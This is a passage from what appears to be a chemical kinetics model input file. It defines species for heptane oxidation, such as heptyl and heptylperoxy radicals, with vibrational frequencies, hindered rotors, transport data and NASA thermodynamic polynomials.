thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.53764,-0.00122827,5.36759e-06,-4.93128e-09,1.45955e-12,-1037.99,4.6718], Tmin=(100,'K'), Tmax=(1087.71,'K')), NASAPolynomial(coeffs=[3.16427,0.00169454,-8.00335e-07,1.5903e-10,-1.14891e-14,-1048.45,6.08303], Tmin=(1087.71,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.62178,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""O2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCC[CH]CCC(73)',
structure = SMILES('CCC[CH]CCC'),
E0 = (-21.1865,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3025,407.5,1350,352.5,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (99.194,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3350.7,'J/mol'), sigma=(6.3658,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=523.37 K, Pc=29.47 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.869629,0.0703718,-3.49835e-05,7.97988e-09,-7.11975e-13,-2437.92,29.442], Tmin=(100,'K'), Tmax=(2507.38,'K')), NASAPolynomial(coeffs=[23.6823,0.0339797,-1.3213e-05,2.19165e-09,-1.34869e-13,-13878.2,-101.587], Tmin=(2507.38,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-21.1865,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(507.183,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJCC)"""),
)
species(
label = 'CCC[CH]O[O](143)',
structure = SMILES('CCC[CH]O[O]'),
E0 = (107.961,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,492.5,1135,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,180,180],'cm^-1')),
HinderedRotor(inertia=(0.120261,'amu*angstrom^2'), symmetry=1, barrier=(2.76503,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.120067,'amu*angstrom^2'), symmetry=1, barrier=(2.76059,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.120388,'amu*angstrom^2'), symmetry=1, barrier=(2.76796,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.48129,'amu*angstrom^2'), symmetry=1, barrier=(11.0658,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (88.1051,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.80224,0.0553008,-3.67942e-05,-1.19722e-08,2.59231e-11,13057,21.9545], Tmin=(100,'K'), Tmax=(531.454,'K')), NASAPolynomial(coeffs=[5.7889,0.0367206,-1.66008e-05,3.14924e-09,-2.19362e-13,12471.9,3.72327], Tmin=(531.454,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(107.961,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOOH) + radical(ROOJ)"""),
)
species(
label = 'npropyl(70)',
structure = SMILES('[CH2]CC'),
E0 = (87.0621,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000],'cm^-1')),
HinderedRotor(inertia=(0.0928812,'amu*angstrom^2'), symmetry=1, barrier=(2.13552,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.092914,'amu*angstrom^2'), symmetry=1, barrier=(2.13628,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (43.0877,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2218.31,'J/mol'), sigma=(4.982,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.02816,0.0147023,2.40511e-05,-3.6674e-08,1.38612e-11,10512.1,12.4699], Tmin=(100,'K'), Tmax=(984.463,'K')), NASAPolynomial(coeffs=[6.16542,0.0184495,-6.7903e-06,1.23049e-09,-8.63868e-14,9095.06,-6.676], Tmin=(984.463,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(87.0621,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(224.491,'J/(mol*K)'), label="""npropyl""", comment="""Thermo library: DFT_QCI_thermo"""),
)
species(
label = 'H(3)',
structure = SMILES('[H]'),
E0 = (211.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,-2.38914e-13,3.12709e-16,-1.33367e-19,1.7499e-23,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(4383.16,'K')), NASAPolynomial(coeffs=[2.50003,-3.04997e-08,1.01101e-11,-1.48797e-15,8.20356e-20,25472.7,-0.459785], Tmin=(4383.16,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCC[C](CCC)O[O](144)',
structure = SMILES('CCC[C](CCC)O[O]'),
E0 = (22.2936,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([360,370,350,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,492.5,1135,1000,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.307683,0.102087,-0.000101217,6.59004e-08,-1.9306e-11,2829.86,35.3038], Tmin=(100,'K'), Tmax=(797.655,'K')), NASAPolynomial(coeffs=[7.35057,0.0636835,-2.89977e-05,5.54111e-09,-3.88302e-13,1608.13,0.0884967], Tmin=(797.655,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(22.2936,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(C2CsJOOH)"""),
)
species(
label = 'C2H5(32)',
structure = SMILES('C[CH2]'),
E0 = (107.874,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,1190.59,1642.33,1643.48,3621.68,3622.96],'cm^-1')),
HinderedRotor(inertia=(0.866827,'amu*angstrom^2'), symmetry=1, barrier=(19.9301,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (29.0611,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2097.75,'J/mol'), sigma=(4.302,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.5, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.24186,-0.00356905,4.82667e-05,-5.85401e-08,2.25805e-11,12969,4.44704], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.32196,0.0123931,-4.39681e-06,7.0352e-10,-4.18435e-14,12175.9,0.171104], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(107.874,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), label="""C2H5""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = '[CH2]C(CCC)O[O](145)',
structure = SMILES('[CH2]C(CCC)O[O]'),
E0 = (96.9176,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,408.322,408.323],'cm^-1')),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.87169,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665328,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665326,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (102.132,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.761829,0.0732135,-6.43673e-05,3.2225e-08,-6.86802e-12,11771.4,29.3513], Tmin=(100,'K'), Tmax=(1094.49,'K')), NASAPolynomial(coeffs=[10.3082,0.0383245,-1.65516e-05,3.0998e-09,-2.1529e-13,9681.74,-17.5663], Tmin=(1094.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(96.9176,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(386.623,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(CJCOOH)"""),
)
species(
label = 'CC[CH]C(CCC)O[O](146)',
structure = SMILES('CC[CH]C(CCC)O[O]'),
E0 = (35.8095,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.308665,0.100406,-8.84314e-05,4.61229e-08,-1.05358e-11,4457.31,38.0039], Tmin=(100,'K'), Tmax=(1010.26,'K')), NASAPolynomial(coeffs=[10.3052,0.0583815,-2.60341e-05,4.94683e-09,-3.46273e-13,2312.78,-13.3102], Tmin=(1010.26,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(35.8095,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJCOOH) + radical(ROOJ)"""),
)
species(
label = '[CH2]CC(CCC)O[O](147)',
structure = SMILES('[CH2]CC(CCC)O[O]'),
E0 = (64.4211,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (116.158,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.305339,0.0849559,-7.17251e-05,3.49657e-08,-7.40173e-12,7878,33.0286], Tmin=(100,'K'), Tmax=(1086.3,'K')), NASAPolynomial(coeffs=[10.2215,0.0484424,-2.13058e-05,4.02302e-09,-2.80588e-13,5723.63,-15.6317], Tmin=(1086.3,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(64.4211,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJ)"""),
)
species(
label = 'CH3(18)',
structure = SMILES('[CH3]'),
E0 = (136.188,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([604.263,1333.71,1492.19,2836.77,2836.77,3806.92],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.65718,0.0021266,5.45839e-06,-6.6181e-09,2.46571e-12,16422.7,1.67354], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.97812,0.00579785,-1.97558e-06,3.07298e-10,-1.79174e-14,16509.5,4.72248], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(136.188,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH3""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = 'C[CH]CC(CCC)O[O](148)',
structure = SMILES('C[CH]CC(CCC)O[O]'),
E0 = (29.8408,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.222128,0.099523,-9.48843e-05,5.89934e-08,-1.65158e-11,3735.18,38.13], Tmin=(100,'K'), Tmax=(831.502,'K')), NASAPolynomial(coeffs=[7.49589,0.0623944,-2.79046e-05,5.29089e-09,-3.69296e-13,2451.69,2.31923], Tmin=(831.502,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(29.8408,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJC)"""),
)
species(
label = '[CH2]CCC(CCC)O[O](149)',
structure = SMILES('[CH2]CCC(CCC)O[O]'),
E0 = (40.6409,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.31089,0.0993682,-8.4228e-05,4.1255e-08,-8.78157e-12,5039.37,37.4872], Tmin=(100,'K'), Tmax=(1080.2,'K')), NASAPolynomial(coeffs=[11.1942,0.0567646,-2.5067e-05,4.74259e-09,-3.31152e-13,2553.82,-18.9057], Tmin=(1080.2,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(40.6409,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJ)"""),
)
species(
label = 'CH2(S)(24)',
structure = SMILES('[CH2]'),
E0 = (418.921,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1358.21,2621.43,3089.55],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.19331,-0.00233105,8.15676e-06,-6.62986e-09,1.93233e-12,50366.2,-0.746734], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.13502,0.00289594,-8.16668e-07,1.13573e-10,-6.36263e-15,50504.1,4.06031], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(418.921,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = 'CCCC(CC)O[O](150)',
structure = SMILES('CCCC(CC)O[O]'),
E0 = (-140.825,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (117.166,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.21933,0.0849261,-6.42064e-05,2.69561e-08,-4.88243e-12,-16803,31.5405], Tmin=(100,'K'), Tmax=(1248.35,'K')), NASAPolynomial(coeffs=[11.4159,0.0490497,-2.10977e-05,3.93422e-09,-2.71954e-13,-19598.4,-24.9599], Tmin=(1248.35,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-140.825,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(482.239,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ)"""),
)
species(
label = 'CCC[C](CCC)OO(139)',
structure = SMILES('CCC[C](CCC)OO'),
E0 = (-129.711,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
